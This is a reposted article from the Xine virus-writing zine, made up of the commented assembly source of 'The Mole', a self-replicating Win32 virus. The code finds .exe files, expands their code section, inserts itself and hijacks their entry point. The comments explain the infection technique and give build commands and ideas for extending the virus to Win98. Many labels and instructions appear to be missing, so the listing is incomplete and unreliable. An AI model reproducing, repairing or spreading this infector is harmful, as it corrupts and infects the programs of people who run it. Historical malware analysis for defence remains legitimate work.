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Xine - issue #4 - Phile 200

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 · 6 months ago

| Xine - issue #4 - Phile 200 |

;The Mole by Murkry\ikx
;A small win32 virus that uses memmap to expand the code section of a
;.exe then place its code there. Does not work on some Win98 files since
;MS in its infinite wisdom has made file aligment 1000h instead of 200h
;of course this makes this type of virus redunant since you do not need
;to expand the section odds are the file will have 400-800h bytes free anyway
;so the day of cavity infectors has come in the form of Win98 but sadly
;this virus does not infect Win98 type files. But it does infect WinNT
;A relative small change in code should rectify this.
;if the file infect mask is changed to *.dll it will work and if then
;return to *.exe it returns. This would be a interesting change for other
;students of vx to explore.

;Tested in NT and Win95 works very well
;size just under 400h to get the date resest and control attributes
;it would need to be bigger say 600h, actaul less but 200h should the
;smallest increment you use for this type of virus

;A quick survey off 30 PE file in a win95 directory shows
; possible percent of files that can be infected versus size of
;virus of this type
; 400h 83%
; 600h 60%
; 800h 50%
; a00h 37%
; c00h 20%
;what am I actual doing here and why does it fail if filealign is 100h
;well in win32 you can asgin filealigment to 200h or 1000h
; (not sure if other values will work but this are the 200 that MS uses)
;now if you fileAL = 200h and the MemoryAligment = 1000h this means
;your file is bigger in memory then what it takes on the disk.
;TASM file do nothing but Exit Process
;On Disk |In Memory
;0 MZ |RVA +0 MZ
;100h PE | 100h PE
;800h Second section | 2000h Second SECTION
;A00h third section | 3000h THIRD SECTION
;C00h fourth section | 4000h FOUURTH SECTION
;somtimes som padding of 200h in size|
;This means there is memory space that is unused, Some Virus have already use
;some of this space 2 of my virus
;Murkry- which uses the space wasted on file and memory In the Header area
;DarkSide- which use the space in the data section
;Well with memmap API's you can rearrnange the file to increase the file space
;available on disk but not increase the space in memory, this is important due
;how pe files execute its code all relocs are hardcode to be at rva + VA of section
;if you were to move the section in memory you then need to adjust all the
;relocs, which can be done but is a pain.If you assume some limits to your file
;size then you can increase the file size with out increasing memory size
;Eaxample of Infect file
;On Disk |In Memory
;0 MZ |RVA +0 MZ
;100h PE | 100h PE
; Virus here | 1800h virus here
;800h Second section | 2000h Second SECTION
;A00h third section | 3000h THIRD SECTION
;C00h fourth section | 4000h FOUURTH SECTION
;now you do need to adjust the physcal offset of each Section in their respective
;section entrys but thats maybe 4 or 6 spots if you need to update relocs it could
;several hundred, and if the .reloc section was stripped from the file good luck
;anyway this method of infection also means you do not have to adjust the
;charteristcs of a section to code since you are infecting the code section
;well I am sure that is clear as mud....
;oh yeah if the file it is infecting it has say greater then 800h of
;free space then the virus will reinfect, which means that the virus will
;now get twice as many chances to infect when this file it executed :>
;I do some weird code down below among other things I leave info on the
;stack soe I can use it later, I also do some weird jmps when memmaping
;the first time throuhg I memmap at files true size , then if its not infected
;and can be I unmap and run thru the same code to map with the new size
; hey it works , looks like vogon poetry but it works
;as a side not I released this virus to the now Defucnt Vicodin TNN site
;and AVP calls it IKX, with really was meant to be called the TheMole since
;it burrowed into the file,
;Oh the reason this cant infect Win98 files, some to all of them (win98 files)
;have file alignments set to 1000h (for faster load time, I hear) All
;win98 files have been requested to be compiled at that size. So when this
;virus checks for free space it will find all sections end at a 1000h increment
;which means there is no free space.
;So what someone needs to do is modify this so instead of expanding files
;it checks to free space in the code section and writes itself there
;this virus would be like a snail or crab that uses the discard shells to
;house itself so code name TheSnail98 , Thats why I say the future of
;cavity infectors is near.. Since I hear WinNT aka Win2000 will also
;have this feature. Thank God Hard Drives are cheap.

;To assemble
;tasm32 /ml /m3 mole;
;tlink32 /Tpe /aa /c /x mole,mole,, import32.lib,

ViriiSize equ 400h

.model flat,stdcall
;Yeah I know they are not needed now :>
extrn GetFileSize:PROC
extrn ExitProcess:PROC

extrn CreateFileA:PROC
extrn CreateFileMappingA:PROC
extrn MapViewOfFile:PROC
extrn UnmapViewOfFile:PROC
extrn CloseHandle:PROC

extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn FindClose:PROC
extrn SetEndOfFile:PROC

FILE_MAP_COPY EQU 000000001h
FILE_MAP_READ EQU 000000004h



GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h


;Header Offsets

PEHeaderSze EQU 0F8h
NumOfSects EQU 06h
SizeOfCode equ 1ch
ImageSze equ 50h

;section offsets
VSize equ 8h
VAddress equ 0Ch
SzeRawData equ 10h
PtrRawData equ 14h
HdrSze equ 28h

Find_data equ 139h
Find_data_name equ 2ch ;where in the structure is the name
FileSizeH equ 14h ;if not zero get out
Filesize equ 20h ;file size low
;find_file db Find_data dup(00) ;size of the find data

;how the stack is used
SHandle equ 0 ;Handle for the search routine
FHandle equ SHandle + 4 ;Handle for open file
CMHandle equ FHandle + 4 ;CreateMFileHandle
MHandle equ CMHandle + 4 ;Mhandle also address of where it is
FindFile equ MHandle + 4

CFile equ FindFile + Find_data + 4
CFMap equ CFile + 4
MapV equ CFMap + 4
CloseH equ MapV + 4
FindFirst equ CloseH + 4
FindNext equ FindFirst + 4
CloseFnd equ FindNext + 4
UnMapV equ CloseFnd + 4
SetFEnd equ UnMapV + 4
Flag equ SetFEnd + 3

GetProc equ Flag + 4
K32Load Equ GetProc + 4
HostPE Equ K32Load + 4
HostLoad equ HostPE + 4
Delta equ HostLoad + 4

WorkSpace equ GetProc

.data ;the data area
dummy dd ? ;this needs some data
;or it won't compile ...easily


db 68h
HostEip dd offset fini - 00400000h


call GetAddie ;this leaves some data on the stack
;which mole use's which I know upsets
;some Purists out there
;Hey it drove me nuts, till I work
;out the stack offsets too
D1: sub esp,WorkSpace
mov ebp,esp
sub dword ptr[ebp + Delta],offset D1 - Offset Mole
;this gives mole its location in memory

;set return up to old eip
mov eax,dword ptr [ebp + HostPE]
add dword ptr [ebp + Delta + 4 + (8*4)],eax

Call GetFunctions ;With the k32 module
;and GetProc we can now get all
;the Fuctions we want

lea eax,[ebp + FindFile]
push eax

mov eax,[ebp + Delta]

add eax, offset Fmask - Offset Mole
push eax
call dword ptr [ebp + FindFirst]

mov dword ptr [ebp + SHandle],eax
inc eax
jz NoFiles
dec eax

mov byte ptr [ebp + Flag],0 ;assume too small
call Map_Infect?

cmp byte ptr[ebp + Flag],0
jz FindNextOne

add dword ptr [Ebp + FindFile + Filesize],ViriiSize
call Map_Infect?

;call Modify

lea eax,[ebp + FindFile]
push eax

mov eax,[ebp + SHandle]
push eax

call dword ptr [ebp + FindNext]
or eax,eax
jnz TryItAgain

lea eax,[ebp + FindFile]
push eax

Call dword ptr [ebp + CloseFnd]

ADD ESP,Delta + 4 ;restore all

ret ;return to the host



xor eax,eax
cdq ;edx = 0

push eax ;handle template

;push FILE_ATTRIBUTE_NORMAL ;attr flags
mov dl,80h
push edx

push large OPEN_EXISTING ;creat flags

push eax ;security issue
push eax ;share mode

push GENERIC_READ or GENERIC_WRITE ;r\w access

Lea eax,[ebp + FindFile + Find_data_name]
push eax ;file name

call dword ptr [ebp + CFile] ;CreateFileA

inc eax ;smaller than cmp eax,-1, je...
jz FileError ;
dec eax ;

cdq ;get edx = 0
mov [ebp + FHandle],eax
;CreateFileMap object
;This is what will determine how big the file is
;when this is done the file size will be changed
;and of course the date is changed

push edx ;fileMap name

push dword ptr [Ebp + FindFile + Filesize]

push edx ;file size high not use for this

push large PAGE_READWRITE ;Protection Rights R/W etc
push edx ;security attr
push eax ;File Handle
call dword ptr [ ebp + CFMap ] ;CreateFileMappingA
cdq ;again zero edx
;why here well ecx usual contains a
;value like C??????? which when xchg
;to eax when you us cdq edx = -1 not 0
xchg eax,ecx

jecxz MapHandleError

mov [ebp + CMHandle],ecx ;2nd FileMapHandle
;Map the View

push edx ;size to map if 0 whole file
;in win95 its always does whole file
push edx ;where it file to start the mapping
;low word
push edx ;high word
push large FILE_MAP_WRITE ;Acces rights
push ecx ;Map Handle
call dword ptr [ebp + MapV] ;MapViewOfFile
xchg eax,ecx
jecxz ErrorFileMap

mov dword ptr [ebp + MHandle],ecx ;3rd Address of where its mapped

;check for the oking of it then jmp out or back to close
;then reopen


cmp word ptr [ ebx+ edx],'EP'
jne NoRoom

LEA esi,[ebx + PEHeaderSze + edx] ; esi = first Section Entry

;check for the section char is
;set for code

test byte ptr [esi + 24h],20h
JE NoRoom

;FindOut if there is room to expand the file

mov ecx,[ESI + VAddress]
add ecx,[ESI + SzeRawData]
mov Eax,[ESI + VAddress + HdrSze ]

sub Eax,Ecx
cmp eax,ViriiSize
jl NoRoom

cmp byte ptr [ebp + Flag],0
jne Roomie

inc byte ptr [ebp + Flag]

jmp GoodOpenSize


call Infect


GoodOpenSize: ;if called close file and get ready to infect

push dword ptr [ebp + MHandle]
call dword ptr [ebp + UnMapV] ;UnmapViewOfFile


push dword ptr [ebp + CMHandle] ;close file map handle
call dword ptr [ebp + CloseH] ;CloseHandle ;on stack Handle to the Map object

push dword ptr [ebp + FHandle]
call dword ptr [ebp + CloseH] ;file CloseHandle ;on stack is the File open



;Ok do the move

push esi
mov edx,[ebp + MHandle]
mov eax,[esi + PtrRawData]
add eax,[esi + SzeRawData] ;where this section ends in the file

mov ecx,dword ptr [Ebp + FindFile + Filesize]

dec ecx
sub ecx,ViriiSize
lea esi,[edx + ecx] ;where to move the data from
lea edi,[edx + ecx + ViriiSize ] ;to
inc ecx

sub ecx,eax ;how much we move for 800h
std ;move backwards
rep movsb ;move it

cld ;move forward again

xchg edi,esi
inc edi

pop esi
push esi

mov eax,[ebp + MHandle]
add eax,[eax + 3ch] ;points to PE

push eax

mov eax,[eax+28h] ;entry point RVA (Eip)
mov byte ptr [edi],68h ;creates the push for the ret
mov dword ptr [edi + 1],eax ;to return to host

pop eax

mov ecx,[ebp + MHandle]
add ecx,[esi + PtrRawData]
push edi
sub edi,ecx
add edi,[esi + VAddress]
;inc edi
mov dword ptr [eax +28h],edi ;update the eip address
pop edi

lea edi,[edi + 5] ;maybe 5 incs are better

mov esi,dword ptr [ebp + Delta]
lea esi,[esi + 5]
mov ecx,offset fini - offset Mole
rep movsb

pop esi ;restore pointer to the section entries

;update the .code area size in the section
add dword ptr [esi + SzeRawData ],ViriiSize
mov eax,dword ptr [esi + SzeRawData]

;update this as well be better if we check if it needed to be
mov dword ptr [esi + VSize],eax

;not updating the image size since we are not
;becoming bigger in memory aligment only file alignment
;in the header PE
;add dword ptr [edx + ebx + ImageSze],ViriiSize

;Do update the code size in the Header area
add dword ptr [edx + ebx + SizeOfCode],ViriiSize

;now update the rest of the sections
Movzx ecx,word ptr [edx + ebx + NumOfSects]
dec ecx

;update the section entries pter to raw data as long as not 0
add esi, HdrSze
cmp dword ptr [esi + PtrRawData],0
je ZPter
add dword ptr [esi + PtrRawData],ViriiSize
ZPter: loop NextSect


;Used For GetAddie
K32 equ 0
BASE equ K32 + 4
Limit equ BASE + 4
AddFunc equ Limit + 4
AddName equ AddFunc + 4
AddOrd equ AddName+4
Nindex equ AddOrd + 4
WorkSp equ Nindex + 4
GetPAdd equ WorkSp + 4
RetAdd Equ GetPAdd + 4

EdataLoc equ 78h
IdataLoc equ 80h


call here
here: pop esi

Call GetPE ;eax,esi
jne GetAddie_fini

push eax ;Address of PE header for this module
push esi ;Load address of Module

Call GetK32API
;On return Esi = a API call in Kernel32

Call GetPE ;eax,esi
push ESI ;Module address of K32

;esi = to the load address Kernel32
;eax = address to the PE header of Kernel32
push large 0 ;hold the return info
Call GetGetProcessAdd

push dword ptr [esp + 10h]



;esi = to the load address Kernel32
;eax = address to the PE header of Kernel32
;on return
;on the stack is the Address

sub esp,WorkSp
mov ebx,ebp

mov ebp,esp


mov dword ptr[ esp+ 8],ebx

mov [ebp + K32],Esi
mov ebx,esi

mov eax,[eax + EdataLoc] ;gets us the Edata offset

lea esi,[eax + ebx + 10h] ;pointer to base

lea edi,[ebp+BASE]

;mov [ebp + BASE],eax ;save base

lodsd ;total number of exported functions
;by name and ordinal

lodsd ;the functions exported by name
;mov [ebp +Limit],eax ;this is how far its safe to look

add eax,ebx

;mov [ebp + AddFunc],eax


add eax,ebx
;mov [ebp + AddName],eax

add eax,ebx
;mov [ebp + AddOrd],eax

mov esi,[ebp + AddName]
mov [EBP+Nindex],esi

mov edi,ebx ;get the load Add of K32
add edi,[esi]

xor ecx,ecx

;find GetProcAddress
cmp [edi],'PteG'
jne NextOne

cmp [edi+4],'Acor'
jne NextOne

cmp [edi+8],'erdd'
jne NextOne

cmp word ptr[edi+0Ch],'ss'
jne NextOne

cmp byte ptr [edi+0Eh],00
jne NextOne

jmp GotGetProcAdd

inc ecx
cmp ecx,[ebp + Limit]
jge NotFound1

add dword ptr [ebp + Nindex],4
mov ESI,[EBP+Nindex]
mov edi,[esi]
add edi,ebx
jmp TryAgain

;ok we have the index into the name array use this to get
; the index into the ord array
shl ecx,1 ;*2 for a word array
mov esi,[ebp + AddOrd]
add esi,ecx ;move to the correct spot in the array

movzx eax,word ptr [esi]
;ax = ordinal value

shl eax,2 ;*4
mov esi,[ebp + AddFunc]
add esi,eax

mov edi, dword ptr [esi]
add edi,ebx ;got the address of it

xchg eax,edi
mov dword ptr [ebp + GetPAdd],eax
jmp OkFound


xor eax,eax

add esp,WorkSp


;ok at this point we have
;esi = to the load address of the program
;eax = address to the PE header now using this get the .idata area
;rather than use the .IDATA section we look for the more dependable
;idata entry in the idatrva section which is offset 80h into the PE header

push ebx
mov ebx,dword ptr [eax + IdataLoc]

add ebx,esi

;Ebx now points to the import data table

cmp dword ptr [ebx+0ch],0
je NoIdataLeft

lea eax,[ebx+0ch]

mov eax,[eax]
cmp dword ptr [eax+esi],'NREK'
jne NotFound
cmp dword ptr [eax+esi+4],'23LE'
jne NotFound

mov eax,[ebx+10h]
mov eax,[eax+esi]

;next line is needed only in debug td32
;only in win95 not Winnt 4.0 at least so far
; mov eax,[eax+1]

xchg eax,esi
pop ebx

xor eax,eax
pop ebx

add ebx,14h
jmp NextDll

;Routine that will , given the address within a .exe in memory
;track back and find the MZ header then using this info one can
;find the Kernel32 (as long as the exe imports a kernel32 function
; on input
;esi = the address to start looking at
;on exit
;esi = the address of the MZ header
;eax = the address of the PE header


push offset FindExcept
push dword ptr fs:[0]
mov fs:[0],esp

and esi,0FFFFF000h
cmp ax,'ZM'
je Found
sub esi,1000h
jmp LoopFind

;Some Exception occured assume "DEAD" area, reset and continue
mov eax,[esp +08h]
lea esp,[eax - 20h]
popa ;restores our "REGS" esi mainly
pop dword ptr fs:[0] ;restore old handler
add esp,4 ;remove last bit of hanlder
sub esi,1000h ;Get set for next page to look at
jmp SetupSEH

popa ;esi = out MZ header
pop dword ptr fs:[0]
add esp,4

Lea eax,[esi + 3ch]

mov eax,[eax]
add eax,esi

cmp word ptr ds:[eax],'EP'


Mov esi,[ebp+ Delta]
add esi,offset Funct_List - Offset Mole

Lea edi,dword ptr [ebp + CFile]

;mov ecx,9 ;*
xor ecx,ecx
mov cl,9

push ecx

push Esi ;function name
Push dword ptr [ ebp + K32Load] ;dll
call dword ptr [ebp + GetProc]

pop ecx

add esi,13h ;get next name

Loop startGetLoop



;Data for The Mole

db "CreateFileA",0 ;12
Fmask db "*.EXE",0 ;5
db 1 dup(90h)

db "CreateFileMappingA",0 ;19

db "MapViewOfFile",0 ;14
db 5 dup(90h)

db "CloseHandle",0 ;12
db 7 dup(90h)

db "FindFirstFileA",0 ;15
db 4 dup(90h)

db "FindNextFileA",0 ;14
db 5 dup(90h)

db "FindClose",0 ;10
db 9 dup(90h)

db "UnmapViewOfFile",0 ;16
db 3 dup(90h)

db "SetEndOfFile",0 ;13
;db 6 dup(90h)
db 'Murkry\IKX'



push LARGE -1
call ExitProcess ;this simply terminates the program

end Mole

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